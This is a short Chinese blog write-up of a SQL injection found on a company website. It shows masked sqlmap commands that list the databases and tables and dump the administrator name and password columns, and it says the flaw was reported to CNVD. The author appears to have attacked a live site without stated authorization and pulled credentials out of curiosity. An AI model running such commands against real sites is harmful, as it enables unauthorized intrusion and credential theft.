记某公司前台SQL注入漏洞

前言

本次实战来源于谷歌搜索引擎。漏洞已经上报CNVD,文章全程打码。本人萌新一枚,大佬勿喷。

实战过程

1.打开网站的前台,此时页面是正常显示,在URL头中发现id值。
记某公司前台SQL注入漏洞
2.尝试加入单引号验证是否存在SQL注入漏洞。发现加入单引号后,页面发生了一些变化。
记某公司前台SQL注入漏洞1
3.直接使用我们的SQL注入神器-SqlMap扫描一波数据库。成功扫描出来数据库。
SqlMap:
python sqlmap.py -u “http://XXXX.com/about.php?id=1”–delay 2 –batch –dbs
记某公司前台SQL注入漏洞2
4.继续查看数据库XXX里面的所有表。
SqlMap:
python sqlmap.py -u “http://XXXX.com/about.php?id=1”–delay 2 –batch -D XXXX –tables
记某公司前台SQL注入漏洞3
5.查看到了所有的表名,好奇心唆使我查看XXX表里的内容
记某公司前台SQL注入漏洞4
6.都到这里了,必须查看里面到底有些啥。这里得到了网站管理员的ZH和MM

SqlMap:
python sqlmap.py -u “http://XXXX.com/about.php?id=1”–delay 2 –batch -D XXXX -T XXXX -C admin_name,admin_pass –dump
记某公司前台SQL注入漏洞5
上报CNVD漏洞平台,溜了溜了。

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享
大佬不来一句? 抢沙发

请登录后发表评论